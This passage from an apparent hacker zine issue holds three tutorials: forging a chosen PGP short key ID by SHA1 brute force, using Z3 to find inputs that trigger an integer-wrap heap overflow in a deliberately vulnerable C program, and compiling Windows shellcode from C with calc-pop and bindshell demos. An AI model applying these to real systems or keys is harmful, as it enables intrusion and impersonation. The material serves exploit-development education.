Now we need to generate a pool of enough keys to have a fair chance of
finding a match, but how many? Well, obviously it depends on the number of
seconds in the time frame we consider acceptable for the key creation time.

Let's dive into some math. Since SHA1 is unbiased, each try is independent,
and for each try we have a fixed probability of finding a match: one in
the number of different possible suffixes = 1 / 2^32.

So, the only thing that matters is how many tries we can do. This number
is s (seconds in the time frame) * x (number of keys in the pool).

The probability of finding a match in k tries is 1 minus the probability
of failing all of them [5], and the latter is (prob of failing one) ^ k =
((2^32 - 1) / 2^32) ^ k.

Here are the final formula and a handy table:

            2^32 - 1   s * x          s = seconds in the time frame
  y = 1 - ( -------- )                x = number of keys in the pool
              2^32                    y = probability of a success

  +--------------+------+------+------+------+------+
  | frame \ prob | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +--------------+------+------+------+------+------+
  |         past |    3 |    5 |    8 |   10 |   15 |
  +--------------+------+------+------+------+------+
  |           5y |   19 |   38 |   63 |   82 |  126 |
  +--------------+------+------+------+------+------+
  |           1y |   95 |  189 |  314 |  408 |  628 |
  +--------------+------+------+------+------+------+

For a fancy 3D graph you can plot the probability on a (years in the time
frame X keys in the keypool) space [6]:

  y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x)

GnuPG has a convenient function to generate keys in batch mode:

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --trustdb-name ./trustpool.gpg \
    --gen-key --batch batchfile.txt

    # batchfile.txt
    Key-Type: RSA
    Key-Length: 4096
    Name-Real: Filippo Valsorda
    Name-Comment: f1los0tt1l3
    Name-Email: f1los0tt1l3@phrack.com
    Expire-Date: 0

Note: it does not matter what you set in the Name-* fields, as we are
going to discard the uid to create a validly signed one later.

Set it to run the number of times you want, maybe plug in haveged [7], a
Geiger or a radio producing white noise and... uh, go grab a coffee.

-----[ 3.2 - The crash

Well, now we have our keypool and we need to bruteforce the key ID out of
it. I wrote a Python 3 + Cython parallelizable implementation, crash.py.

Compile the Cython module with (you'll need Cython and OpenMP):

    $ python3 setup.py build_ext --inplace

Note: clang and old gcc versions panicked, I used gcc 4.7.

Then start the bruteforce with

    $ python3 crash.py pubpool.gpg NEWKEYID [0xTIMESTAMP]

where 0xTIMESTAMP is the lowest limit to the creation time, if any.

Want to know something cool? The only thing needed to do the bruteforce is
the pubpool, so you can export it out of your crappy airgapped system and
perform the number crushing on some powerful untrusted machine.

You will hopefully get a result like this

  Current fingerprint: 9b179a2af2f8a744b2214de4eec578f57e61d52a
  Current timestamp: 0x512187c9
  NEW fingerprint: d8efd70f8479432e9158ac27eb56af7c42424242
  RESULT timestamp: 0x1b550652

------[ 3.2.1 - Runtime stats

The bulk of the heavy-lifting involved in this bruteforce is making the
SHA1 hashes, and one of them is done for each timestamp tried. The number
of tries is clearly independent of the width of the time frame, and grows
with the probability of finding a match. The two - probability and tries -
are bound by a simplified version of the formula above.

            2^32 - 1   x
  y = 1 - ( -------- )                x = tries / SHA1 hashes
              2^32                    y = probability of a success

So what matters here is what SHA1 hashrate we manage to get. The crash.py
Cython implementation is quite fast, and achieves 3.0 * 10^6 h/s on a
quad-core 2.3 GHz i7 or 8.3 * 10^6 h/s on an AWS EC2 cc2.8xlarge instance.

Note: this means that a matching key would cost you $0.50 of Spot Instance
as of April 2013.

However, much better can be done: the oclHashcat-plus guys claim 3.081 *
10^9 SHA1/s on an AMD hd6990 GPU [8]. With a hashrate like that, a match
can be found in a matter of seconds. Writing a high-performance CUDA or
OpenGL implementation is left as an exercise to the reader ;)

Here is a reference table of running times:

  +----------------+------+------+------+------+------+
  |    probability | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +----------------+------+------+------+------+------+
  |   tries / 10^9 |  2.9 |  5.9 |  9.8 | 12.8 | 19.7 |
  +----------------+------+------+------+------+------+
  |  runtime on i7 |  17m |  33m |  55m |  71m | 110m |
  +----------------+------+------+------+------+------+
  | runtime on EC2 |   6m |  12m |  20m |  26m |  40m |
  +----------------+------+------+------+------+------+
  | runtime on GPU |   1s |   2s |   3s |   4s |   6s |
  +----------------+------+------+------+------+------+
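
The pool-size table in 3.1 and the runtime table above both follow from
the same formula; this added example (not part of crash.py) inverts it and
reproduces them. It assumes 365-day years, 1970 to 2013 for the "past"
frame as in reference [6], rounding up for pool sizes and to the nearest
unit for runtimes; the hash rates are the ones quoted in the text and the
function names are constructed.

```python
import math

# ln((2^32 - 1) / 2^32): log-probability that one try misses the short ID.
LOG_MISS = math.log1p(-2.0 ** -32)

PROBS = (0.50, 0.75, 0.90, 0.95, 0.99)
YEAR = 60 * 60 * 24 * 365
FRAMES = {"past": (2013 - 1970) * YEAR, "5y": 5 * YEAR, "1y": YEAR}
# SHA1 hashes per second, as quoted in 3.2.1.
RATES = {"i7": 3.0e6, "EC2": 8.3e6, "GPU": 3.081e9}


def success_probability(tries):
    """y = 1 - ((2^32 - 1) / 2^32) ^ tries, computed without cancellation."""
    return -math.expm1(tries * LOG_MISS)


def tries_needed(y):
    """Invert the formula: tries = ln(1 - y) / ln((2^32 - 1) / 2^32)."""
    if not 0.0 < y < 1.0:
        raise ValueError("probability must be strictly between 0 and 1")
    return math.log1p(-y) / LOG_MISS


def pool_size(y, seconds):
    """Keys needed so that seconds * keys tries reach probability y."""
    return math.ceil(tries_needed(y) / seconds)


def pool_table():
    """Rows of the 3.1 table: frame -> pool size for each probability."""
    return {frame: [pool_size(y, s) for y in PROBS]
            for frame, s in FRAMES.items()}


def runtime_table():
    """Rows of the 3.2.1 table: minutes for i7 and EC2, seconds for GPU."""
    table = {}
    for name, rate in RATES.items():
        unit = 1 if name == "GPU" else 60
        table[name] = [round(tries_needed(y) / rate / unit) for y in PROBS]
    return table


if __name__ == "__main__":
    for frame, row in pool_table().items():
        print(f"{frame:>5}", row)
    print("tries/10^9", [f"{tries_needed(y) / 1e9:.2f}" for y in PROBS])
    for name, row in runtime_table().items():
        print(f"{name:>5}", row)
```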

-----[ 3.3 - The patch

Now we have to patch the key. patch.py, incredibly, does exactly so.

First, export the secret key for which you had the match

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --export-secret-keys OLDKEYID > privkey.gpg

Then run patch.py on it, passing it the "RESULT timestamp" from crash.py:

    $ python3 patch.py privkey.gpg TIMESTAMP > resultkey.gpg

Finally, force gpg to import the key even if the (invalid) binding
signature has been stripped:

    $ gpg --allow-non-selfsigned-uid --import resultkey.gpg

And restore the binding signature by creating a new uid:

    $ gpg --edit-key NEWKEYID

    gpg> adduid
    gpg> uid 1
    gpg> deluid
    gpg> trust
    gpg> check
    gpg> save

Note: don't create the new uid as an exact copy of the old, otherwise
deluid will delete both of them from the secret key - it's a GnuPG bug.

Done! You now have your new shiny PGP key with a personal key ID. Export
it to your main GnuPG env or whatever.

---[ 4 - Conclusion

Have fun, there are still many interesting uncaught key IDs out there:
0x11111111, 0xabaddeed, 0xaaaaaaaa, 0xg00d1dea, 0x27182818, 0x14142135...
Please just leave 0x31415926, 0x42424242 and 0x13371337 for me ;) and
don't (publicly) duplicate other people's keys.

Finally, I know what you are searching for: the option is --keyid-format
long ;)

---[ 5 - References

[1] "PGP CPU time wasta (never refer to pgp key using 32bit key-id)"
http://seclists.org/fulldisclosure/2010/May/120
[2] "Short key IDs are bad news (with OpenPGP and GNU Privacy Guard)"
http://www.asheesh.org/note/debian/short-key-ids-are-bad-news.html
[3] "OpenPGP Message Format" - Callas, et al - November 2007
https://tools.ietf.org/html/rfc4880
[4] "Cryptanalysis of RSA with Small Prime Difference" - B de Weger - 2002
http://www.enseignement.polytechnique.fr/profs/informatique/Francois.Morain/Master1/Crypto/projects/Weger02.pdf
[5] Complementary event - Wikipedia
https://en.wikipedia.org/w/index.php?title=Complementary_event&oldid=545752375#Example_of_the_utility_of_this_concept
[6] y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x) with a
from 1 to (2013 - 1970) with x from 1 to 200 - Wolfram|Alpha
http://wolfr.am/YxKsTU
[7] haveged - A simple entropy daemon
http://www.issihosts.com/haveged/
[8] oclHashcat-plus - advanced password recovery | Performance section
http://hashcat.net/oclhashcat-plus/

---[ 6 - Code



|=[ 0x05 ]=---=[ How to cheat at maths - chown ]=------------------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ How I Cheat at Maths - Z3 101 ]---------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------------=[ by chown ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Welcome reader. I am writing this small text because it has recently come
to my attention that a lot of people significantly smarter than me are
intimidated by the mention of Z3 and solvers in general, and avoid using
them. I think it is a common mentality that Z3 requires some kind of maths
degree as a prerequisite for its use; however, for me it is the complete
opposite.

Hopefully by the end of this small guide you will see that Z3 can provide a
trivial platform with which you can avoid doing most of the complex math
work which is associated with exploit development and reverse engineering.

--[ What is Z3?

Z3 is an SMT (satisfiability modulo theories) solver written by Microsoft
Research. It is cross-platform (Windows/Linux/Mac OS X) and free (MIT
License).

Internally at Microsoft it is used for program analysis and verification.

Z3 exposes either a C or Python based API, with a rich set of features. In
this paper we will only scratch the surface of the Python API. I feel this
is the simplest way to jump right in and instantly get value from Z3 with
almost no learning curve required. There is a lot of documentation on the
web if you wish to venture deeper into the functionality of Z3. 

--[ Installing Z3

Installing Z3 is a simple process and, as I mentioned, can be done on most
operating systems. The source code to Z3 is available from the Z3 GitHub
page (2).

The build instructions for Mac OS X are simply as follows:

    CXX=clang++ CC=clang python scripts/mk_make.py
    cd build
    make
    sudo make install

For Ubuntu it is even simpler:

    sudo apt-get install python-z3

Once this is done, the Python module can be used by simply using "import
z3" from within Python.

--[ Introduction to Z3

To whet your appetite, we will first explore a simple maths example
unrelated to exploit development. The following small puzzle was being
passed around social media sites:

    A+B   = 240
    C+D   = 500
    D-B+C = 455
    A+C   = 215
    What answer for D?

While this can easily be solved with math, it is much easier to make Z3 do
all the work for us.

The first step in our solver is to import z3 and declare some variables for
use in the solver. The following code creates four Int() type variables
(A, B, C and D) and instantiates the Solver class.

Note: The string passed to each variable is used to label the results when 
the model is printed at the end.

    #!/usr/bin/env python

    from z3 import *

    # Declare our variables
    A = Int('A')
    B = Int('B')
    C = Int('C')
    D = Int('D')

    s = Solver()

Now that we have our variables declared, we must define some simple
constraints for the solver. Basically we need to take each line in the
above problem and convert it to an expression using our variables.

    # Add the constraints
    s.add(A + B == 240)  # A+B   = 240
    s.add(C + D == 500)  # C+D   = 500
    s.add(D-B+C == 455)  # D-B+C = 455
    s.add(A+C == 215)    # A+C   = 215

The final steps are to use the check() function to solve the problem and
print the model at the end.

    print("[+] Solving...")
    s.check()
    ttt = s.model()
    print("[MODEL---------------------------------------]")
    print(ttt)
    print("[--------------------------------------------]")

Running this code provides the following output:

    $ python facebook.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [C = 20, B = 45, D = 480, A = 195]
    [--------------------------------------------]

As you can see, it only took a couple of minutes to code a solver for this
problem and we got the answer D=480. Congratulations, if you followed this
far you can now cheat at facebook and impress your friends!!!

I have included the sample code for this (facebook.py) in the appendix.

--[ Z3 and Exploit dev

As I'm sure you can now imagine there are a billion small math problems
like this in exploit development. Some typical examples for me are:

* Solving input values to control allocation/copy sizes.
* Root causing a fuzz crash, one constraint for each cmp instruction, then
  control register contents as needed.
* Finding input values which constrain to certain criteria.
* etc.

To make this more clear, I have written a small vulnerable program with
which we can look at the exploitation process and how Z3 can help us.

----[ Vulnerable example

The following example code has a clearly visible integer wrap
vulnerability. We can obviously utilize this to cause a heap overflow into
the chunk pointed to by sstr.

Have a quick read over the code below, and afterwards I will explain the
challenges involved in solving this problem.

     1  #include <stdio.h>
     2  #include <stdlib.h>
     3  #include <string.h>
     4  
     5  #define HEADER "-------------------------------------------[ ASCII DIAGRAM ]----------------------------------------------------\n"
     6  #define HDRLEN strlen(HEADER)
     7  
     8  char *copyandupdate(char *dst,char *src, unsigned int size)
     9  {
    10      memcpy(dst,src,size);
    11      dst += size;
    12      return dst;
    13  }
    14  
    15  int main(int argc, char *argv[])
    16  {
    17      unsigned int width,height,i;
    18      char *sstr,*fstr;
    19  
    20      if(argc != 3) {
    21          printf("usage: %s <width> <height>\n",argv[0]);
    22          exit(-1);
    23      }
    24  
    25      width  = strtoul(argv[1],NULL,0);
    26      height = strtoul(argv[2],NULL,0);
    27  
    28  
    29      printf("[+] Using width: %u\n",width);
    30      printf("[+] Using height: %u\n",height);
    31  
    32      if(width < 5) {
    33          printf("error: Width too small\n");
    34          exit(1);
    35      }
    36  
    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width * height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height + HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);
    44      if(!fstr) {
    45          printf("error: Out of Memory!\n");
    46          exit(1);
    47      }
    48  
    49      printf("[+] Writing header to buffer (%u bytes)\n",HDRLEN);
    50      fstr = copyandupdate(fstr,HEADER,HDRLEN);
    51      for(i = 0 ; i < height ; i++ )
    52      {
    53          char *m = malloc(width);
    54          if(!m) {
    55              printf("error: Out of Memory!\n");
    56              break;
    57          }
    58          memset(m,'X',width);
    59          m[width-3] = '\r';
    60          m[width-2] = '\n';
    61          m[width-1] = '\x00';
    62          fstr = copyandupdate(fstr,m,width-1);
    63          free(m);
    64      }
    65  
    66      printf(sstr);   
    67  
    68  }
    69  

As I'm sure you saw, this code takes a width and height parameter from the
command line and creates an ASCII table containing the appropriate number
of X's.

Here is some sample output from a successful run:

$ ./asciigrid 30 10
[+] Using width: 30
[+] Using height: 10
[+] Allocating buffer sized: 413
[+] Writing header to buffer (113 bytes)
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX

The major vulnerability in this source code occurs between lines 37 and
43 in the source. As you can see below, the code takes the width and height
parameters and checks to make sure that the product of width * height plus
the length of the header is < 0x40000000. Next it allocates a buffer based
on these values. However, if width and height are large enough to cause an
integer wrap, the resulting buffer allocation will not correlate to the
width and height values themselves, creating potential for a heap overflow.

    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width * height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height + HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);

Once this allocation is performed, the program begins by writing the HEADER
field into the buffer. Depending on the size of the buffer this will either
be inside or outside the allocated buffer. Due to the wrapping allocation
size calculation, there is no guarantee at this stage that a large enough
allocation was performed to house the HEADER field. 

Finally at line 51, a copy loop is performed. For each of the lines in
height an allocation of "width" bytes is performed. This is then populated
with a line of X's, and copied into the buffer. Obviously if our values are
large enough to wrap, this loop will end up writing out of bounds of our
buffer. It also has no way to stop copying, so it will keep writing until
it hits an unmapped page, causing program termination.

    51          for(i = 0 ; i < height ; i++ )
    52          {
    53                  char *m = malloc(width);
    54                  if(!m) {
    55                          printf("error: Out of Memory!\n");
    56                          break;
    57                  }
    58                  memset(m,'X',width);
    59                  m[width-3] = '\r';
    60                  m[width-2] = '\n';
    61                  m[width-1] = '\x00';
    62                  fstr = copyandupdate(fstr,m,width-1);
    63                  free(m);
    64          }

Luckily for us (;)) there does exist a clean way out of this loop. If the
malloc allocation of width bytes fails, the loop is exited, and the program
continues.

This means, if we can wrap the allocation while having a large enough width
to force the allocation to fail, we are able to perform our overflow
(copying the header out of bounds) without program termination occurring.
(This gives us an opportunity to utilize our overflow). The question is,
what input values will allow all this to happen?

---[ Solving

As you can imagine, the next step in our process is to write a simple
solver to calculate these values for us. Once again the process is very
simple.

We begin by importing our library:

    #!/usr/bin/env python

    from z3 import *

Next we need to declare the variables used by our sample program. The first
variables which we need are the width and height variables. In the previous
example we used Int() type variables. However, in this case, we use a
BitVec() type. The main difference between these two types in Z3 is the
ability to perform binary operations on the BitVec. We are also able to
specify the exact size of the variable, which lets us more easily simulate
integer wraps. In this example I am targeting a 32-bit platform, therefore
I use the size 32 for each variable. We also need a variable to hold the
size of the header; this is not strictly necessary but provides clearer
output in my opinion.

    width = BitVec('width', 32)
    height = BitVec('height', 32)
    headersize = BitVec('headersize',32)

Next, I create a convenience variable allocsize. This is used to hold the
result of the calculation. Instead of this variable we could simply write
width * height + headersize each time; however, if we did this, the size of
the allocation would not be visible in the printed model. Since we care
about this size, it makes sense to use a convenience variable.

    allocsize = BitVec('allocsize',32)

    s = Solver()

Now that we've declared our variables and initialized the Solver the next
step is to add constraints to our model. The first constraint in this
program is simply declaring the headersize value. This is done with the
following line:

    s.add(headersize == 113)

The next constraint we can add is to make sure that width by itself is
enough to cause the allocation to fail. An easy way to do this is to make
sure it is above 0xf0000000, since this would be large enough for a 32-bit
process to fail. You may notice that we used a function "UGT" for this,
rather than the > operator. The reason for this is that the > operator by
default will perform a signed comparison. UGT (unsigned greater than) will
provide us with the unsigned functionality we need. As you can imagine, the
counterpart to this, ULT(), will perform an unsigned less than comparison.
Reading the help for the module will show many other useful functions
similar to this.

    s.add(UGT(width,0xf0000000)) # For malloc fail

Obviously, we need a constraint to calculate allocsize. This is simply a
case of performing the same calculation directly from the source code.

    s.add(allocsize == width * height + headersize)

We then make sure that the allocsize is less than the headersize, so that
an overflow occurs.

    s.add(ULT(allocsize & 0xffffffff,headersize))

Finally, we solve and print the model...

    print("[+] Solving...")
    s.check()
    ttt = s.model()
    print("[MODEL---------------------------------------]")
    print(ttt)
    print("[--------------------------------------------]")

If we run this solver, the following values are generated:

    $ python solver.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [height = 2318056819,
     width = 4192030789,
     allocsize = 112,
     headersize = 113]
    [--------------------------------------------]

Inputting this into the target program confirms our technique: an
allocation of 112 bytes is performed and then a header (113 bytes) is
written to it. Finally an allocation fails, and the loop is exited, then
the buffer is printf'ed. (in a vulnerable way... ;) )

$ ./asciigrid 4192030789 2318056819
[+] Using width: 4192030789
[+] Using height: 2318056819
[+] Allocating buffer sized: 112
[+] Writing header to buffer (113 bytes)
asciigrid(98654,0xa33e5000) malloc: *** mach_vm_map(size=4192034816) failed
(error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
error: Out of Memory!
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------

Finding a way to leverage this overflow is outside of the scope of this
paper, however I have personally leveraged a very similar situation in a
real life application.


---[ Adding constraints to enumerate possibilities?

In the above example, the solver gave us a situation where the buffer was
sized 1 byte smaller than the copy, however, in real life, most allocators
naturally align sizes before returning a chunk to the program. This means
that in the above example, no overflow would actually take place. Also with
the above situation, we often want to enumerate the QUANTUM sizes which we
can utilize on the heap, so we can look for overflow targets etc.

Z3 is not really designed for this (solving all permutations) and is more
designed for solving a single one. However, we can easily cheat by adding
additional constraints to the program. A simple example of this: since we
know that a buffer size of 112 is possible, we simply add a constraint
making sure that allocsize is less than that.

     s.add(ULT(allocsize & 0xffffffff,112))

Solving again, we can see that an allocsize of 98 is possible. Since this
is code, we can easily wrap this in a loop to enumerate all possibilities.

    [+] Solving...
    [MODEL---------------------------------------]
    [allocsize = 98,
     height = 732446463,
     width = 4167741711,
     headersize = 113]
    [--------------------------------------------]
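
The size check from lines 37-43 of the listing, replayed with the two
width/height pairs the solver printed above, next to an overflow-safe form
of the same bound. This is an added example, not code from the original
paper; the function names and the use of fixed 32-bit types to model the
paper's 32-bit target are assumptions.

```c
#include <stdint.h>
#include <stdio.h>

/* Constants taken from the listing: strlen(HEADER) is 113 and the bound
 * tested on line 37 is 0x3fffffff. */
#define HDRLEN     113u
#define SIZE_LIMIT 0x3fffffffu

/* Lines 37-43 as written, modelled with uint32_t to match the paper's
 * 32-bit target. Returns the size handed to malloc(), or -1 if the
 * "Table too large" branch is taken. */
int64_t alloc_size_original(uint32_t width, uint32_t height)
{
    uint32_t total = width * height + HDRLEN;   /* wraps modulo 2^32 */

    if (total > SIZE_LIMIT)
        return -1;
    return (int64_t)total;
}

/* Same bound, rearranged so that no intermediate value can wrap:
 *   width * height + HDRLEN <= SIZE_LIMIT
 *   <=>  height <= (SIZE_LIMIT - HDRLEN) / width      (width > 0)
 * The width < 5 test from line 32 is folded in, which also rules out a
 * division by zero. */
int64_t alloc_size_hardened(uint32_t width, uint32_t height)
{
    if (width < 5)
        return -1;
    if (height > (SIZE_LIMIT - HDRLEN) / width)
        return -1;
    return (int64_t)(width * height + HDRLEN);  /* cannot wrap here */
}

/* Print the mathematically correct size next to what each check returns. */
static void show(uint32_t width, uint32_t height)
{
    unsigned long long true_size =
        (unsigned long long)width * height + HDRLEN;

    printf("width=%-10u height=%-10u true=%-20llu original=%-6lld hardened=%lld\n",
           (unsigned)width, (unsigned)height, true_size,
           (long long)alloc_size_original(width, height),
           (long long)alloc_size_hardened(width, height));
}

int main(void)
{
    show(30u, 10u);                     /* the benign run from the paper */
    show(4192030789u, 2318056819u);     /* first solver model  (allocsize 112) */
    show(4167741711u, 732446463u);      /* second solver model (allocsize 98)  */
    return 0;
}
```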

--[ Conclusion

Hopefully this small guide is useful to you. I find myself using these
small solvers constantly during exploit dev. Some other areas that these
help with are, during auditing - to confirm findings, during exploitation -
to calculate values on the fly. I'm sure once you start playing with this
library you will do the same. 

--[ References

1. https://z3.codeplex.com/ - Z3 Home Page
2. https://github.com/Z3Prover/z3 - Z3 github page

--[ Appendix: Source code


|=[ 0x06 ]=---=[ Shellcode the better way, or
                 how to just use your compiler - fishstiqz ]=------------=|


|=-----------------------------------------------------------------------=|
|=----=[ Shellcode the better way, or how to just use your compiler ]----=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by fishstiqz ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Back in the prehistoric days of memory corruption bugs and exploitation,   
exploit developers used our primitive tools to construct rudimentary
payloads in assembly language. Those days are long past. In this small
paper I will investigate some methods for anyone still stuck in the good
ol' days of yore using their assembler.

--[ Prerequisites

This writeup uses the MinGW compiler to demonstrate generating shellcode
from C for running on Windows systems. The same concepts should apply to
other compilers (such as MSVC) with some tweaking. The python scripts also
use the 'pefile' library from erocarrera in order to extract the compiled
code.

To quickly get started compiling on a linux system, do something like:

    $ sudo apt-get install gcc-mingw-w64
    $ pip install pefile

--[ Concepts

There is nothing special about shellcode as opposed to any other compiled
code. A shellcode is simply some piece of machine code that typically
exhibits the following properties:

* Position-independence
* Entry point at first byte
* Bootstrap for subsequent execution / further access

Position-independence is basically the only real hurdle faced when
building shellcode with a C compiler. Strings and imported functions will
need to be handled inline. All code will need to be placed in one section
and will need to be ordered appropriately in order to ensure everything is
appropriately extracted and relative jumps are correct.

This paper will not deal with creating shellcodes that are intended to
bypass filters. In the extremely rare event that a filter is necessary
(when is the last time you actually needed one in your browser exploit?)
it is best to write an encoder and decoder.

--[ Inlining strings

Inlining strings is quite easily accomplished with inline assembly as in
the following macro:

    #define INLINE_STR(name, str) \
        const char * name;          \
        asm(                        \
            "call 1f\n"             \
            ".asciz \"" str "\"\n"  \
            "1:\n"                  \
            "pop %0\n"              \
            : "=r" (name)           \
        );

This is how it would be used:

    INLINE_STR(kernel32, "kernel32");
    PVOID pKernel32 = scGetModuleBase(kernel32);

Unfortunately MinGW doesn't have a way to inline a unicode string nor does
MSVC have inline assembly for x64 so a different method must be employed
when these are being used.

One potential way to handle unicode strings would be to generate an inline
sequence of .db bytes as a pre-compile step. For MSVC, writing strings one
character at a time to a stack buffer also works but is quite ugly.

--[ Ordering functions

The Makefile included with the source code makes use of the
-fno-toplevel-reorder switch which causes functions to be generated in the
same order they appear in the source files. The Makefile also uses
-falign-functions=1 to reduce padding between functions and generate
smaller code.

Each function is also marked with an attribute forcing it to be
placed into a custom section.

    #define SCFUNC __attribute__((section("sccode")))

This custom section makes extraction of the final code very simple
as all shellcode functions will be placed into the "sccode" section
and ordered appropriately.

In MSVC an order file can be specified with /ORDER to achieve the
same effect.

--[ Example shellcode

The following is a quick GetProcAddress implementation in C which
will be used for the examples here.

    SCFUNC PVOID scGetModuleBase(const char *moduleName)
    {
        PPEB pPeb;
        PLIST_ENTRY head, entry;
        PLDR_DATA_TABLE_ENTRY module;

    #if defined(_M_IX86)
        pPeb = (PPEB) __readfsdword(0x30);
    #elif defined(_M_X64)
        pPeb = (PPEB) __readgsqword(0x60);
    #endif

        head = &pPeb->Ldr->InLoadOrderModuleList;
        entry = head->Flink;

        while (entry != head)
        {
            module = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY,
                                       InLoadOrderModuleList);
            if (scW2Anicmp(module->BaseDllName.Buffer, moduleName,
                           scStrlen(moduleName)) == 0)
                return module->DllBase;
            entry = entry->Flink;
        }

        return NULL;
    }

    SCFUNC PVOID scGetProcAddr(PVOID modBase, const char *exportName)
    {
        LPVOID pFunc = NULL;
        PBYTE pMod = (PBYTE)modBase;
        PIMAGE_NT_HEADERS pNt = GET_NT_HEADERS(pMod);
        PIMAGE_DATA_DIRECTORY pDir = &GET_DIRECTORY(pNt,
                                         IMAGE_DIRECTORY_ENTRY_EXPORT);
        PIMAGE_EXPORT_DIRECTORY pExportDir;
        WORD *pOrdinal;
        DWORD *pName;
        DWORD *pFuncs;
        DWORD i;

        // get the export directory
        pExportDir = (PIMAGE_EXPORT_DIRECTORY)(pMod +
                                               pDir->VirtualAddress);

        // sanity check the export directory
        if (pDir->Size == 0 || pExportDir->NumberOfFunctions == 0 ||
            pExportDir->NumberOfNames == 0)
            return NULL;

        // iterate the exported names
        pName = (DWORD *) (pMod + pExportDir->AddressOfNames);
        pOrdinal = (WORD *) (pMod + pExportDir->AddressOfNameOrdinals);

        // hi EMET!
        pFuncs = (DWORD *) (pMod + pExportDir->AddressOfFunctions);

        for (i = 0; i < pExportDir->NumberOfNames; i++, pName++,
             pOrdinal++)
        {
            if (scStrcmp(exportName, (const char *)(pMod + *pName)) == 0)
            {
                // found the name, get the function
                pFunc = pMod + pFuncs[*pOrdinal];
                break;
            }
        }

        return pFunc;
    }

Here you can see a quick calc-pop demonstration using the above code:

    #include <stdio.h>
    #include <windows.h>

    #include "common.h"
    #include "pe.h"

    typedef UINT (WINAPI * WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);

    SCFUNC void scMain(void)
    {
        INLINE_STR(kernel32, "kernel32");
        INLINE_STR(winexec, "WinExec");
        INLINE_STR(calc, "calc");

        PVOID pKernel32 = scGetModuleBase(kernel32);
        WinExec_t pWinExec = (WinExec_t) scGetProcAddr(pKernel32, winexec);
        if (pWinExec != NULL)
            pWinExec(calc, 0);
    }


    int main(int argc, char* argv[])
    {
        scMain();
        return 0;
    }

That's all there is to the code. Notice that all shellcode functions
are marked with the SCFUNC attribute and all strings are inlined.

Now to compile and extract the shellcode into a nice header:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o runcalc.exe runcalc.c common.c pe.c
    $ python extract.py runcalc.exe
    // 460 bytes
    unsigned char shellcode[460] = {
    };

And now to demonstrate running the test harness:

    $ python extract.py --testharness runcalc.exe > runcalc_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
          -Os -o runcalc_testharness.exe runcalc_testharness.c

On the Windows machine:

    C:\phrack\src>runcalc_testharness.exe
    jumping to shellcode @ 00020000
    done
    C:\phrack\src>tasklist | findstr calc
    calc.exe                      5720 Console                    1     14,244 K

--[ Bindshell example

The following is a demonstration of a quick Windows bindshell. Consult the
source code for the implementation.

On the Linux compiler:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell.exe bindshell.c common.c pe.c
    $ python extract.py --testharness bindshell.exe > \
             bindshell_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell_testharness.exe bindshell_testharness.c

On the Windows machine:

    C:\phrack\src>bindshell_testharness.exe
    jumping to shellcode @ 00020000

Attacker:

    $ telnet 192.168.204.144 3333
    Trying 192.168.204.144...
    Connected to 192.168.204.144.
    Escape character is '^]'.
    Microsoft Windows [Version 10.0.10240]
    (c) 2015 Microsoft Corporation. All rights reserved.

    C:\phrack\src>ver
    ver

    Microsoft Windows [Version 10.0.10240]

    C:\phrack\src>whoami
    whoami
    win10-vm\user

    C:\phrack\src>exit
    exit
    Connection closed by foreign host.


--[ Conclusion

Hopefully this humble paper showed that it's super easy to generate
shellcode with a C compiler and that you don't have to use an assembler.
Obviously assembly language development and understanding are still
essential skills for a modern exploit developer. However, using the
techniques presented in this paper should limit the times when
hand-written assembly code is required to a few specific cases.

--[ References

1. http://www.mingw.org/
2. https://github.com/erocarrera/pefile
3. https://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html
4. https://msdn.microsoft.com/en-us/library/00kh39zz.aspx

--[ Appendix: Source code



|=[ 0x07 ]=---=[ Resisting the Hy(p|v)e - anon & anon ]=-----------------=|


|=-----------------------------------------------------------------------=|
|=---------------------=[ Resisting the Hy(p|v)e ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ anon & anon ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Contents


  1 - Prelude
  2 - The Common Good
